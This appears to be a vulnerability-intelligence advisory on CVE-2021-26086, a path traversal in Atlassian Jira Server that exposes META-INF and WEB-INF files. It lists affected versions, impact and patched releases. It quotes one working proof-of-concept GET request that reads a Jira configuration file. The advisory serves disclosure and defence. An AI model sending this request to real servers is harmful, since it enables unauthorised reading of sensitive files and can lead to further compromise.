Category
|
Vulnerability Intelligence
|
Vulnerability Class
|
Path Traversal and Read File Vulnerability
|
CVE ID
|
CVE-2021-26086
|
CVSS:3.0 Score
|
5.3
|
CVSS Severity
|
Medium
|
TLP#
|
GREEN
|
Reference
|
#https://en.wikipedia.org/wiki/Traffic_Light_Protocol
|
Executive Summary
- Jira released an advisory[ 1 ] about the newly identified path traversal and read file vulnerability, CVE-2021-26086, in the Jira Software Server.
- Jira Software is a proprietary issue tracking product developed by Atlassian that allows bug tracking and agile project management.
- This vulnerability is being actively exploited in the wild and has affected multiple versions of the software.
- Atlassian has released a patch for CVE-2021-26086 in their latest versions of the Jira software including versions 8.5.14, 8.13.6, 8.16.1, and 8.17.0.
- Threat actors could exploit this vulnerability to poison the server logs, thereby causing remote code execution and/ or exfiltration of sensitive files and information.
Analysis
- Jira Atlassian is one of the most popular ticketing tools used by organizations around the world. The vulnerability, CVE-2021-26086, is present in the following versions of Atlassian Jira Server and Data Center:
- All versions below 8.5.14
- All versions from 8.6.0 and before 8.13.6
- All versions from 8.14.0 and before 8.16.1
- This vulnerability allows a remote attacker to read all files via a path traversal vulnerability in the /WEB-INF/ and /META-INF/ directories.
- The ease of exploitation of this flaw is alarming as a simple GET request to the above-mentioned endpoint would result in file inclusion.
- Successful exploitation would result in full disclosure of sensitive logging files and configuration settings. [ 2 ]
Proof of Concept (POC)
The Proof of Concept (POC)
[ 3 ] for this vulnerability involves sending a GET request to the /META-INF/ endpoint to retrieve sensitive information. The code used for this request is:
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
The execution of this code segment is shown in the image below along with the endpoint being used.
[caption id="attachment_18038" align="alignnone" width="935"]

Screenshot of the Proof of Concept[/caption]
Impact & Mitigation
Impact
|
Mitigation
|
- A remote attacker can read files and sensitive logging information which is available in META-INF or WEB-INF directory.
- META-INF directory contains logging information and advanced configuration settings which can be read by the attacker.
- A remote attacker can leverage that information to chain the attack and increase the attack surface.
- This vulnerability can be leveraged to conduct an RCE (Remote code execution) attack by poisoning the logs on the server.
- RCE allows attackers to take control of target systems and even execute ransomware on them.
- Initial access to a corporate endpoint may potentially enable lateral movement across the internal network.
- Nation-state actors leverage client-side zero-day vulnerabilities to compromise information, while ransomware groups use these vulnerabilities to extort money by encrypting user data.
|
- Immediately update the Jira Software to any of the following patched versions:
- 8.5.14
- 8.13.6
- 8.16.1
- 8.17.0
|
References
- JIRA SERVER Advisory
- Important Directories and Files - Jira Server
- POC by PacketStorm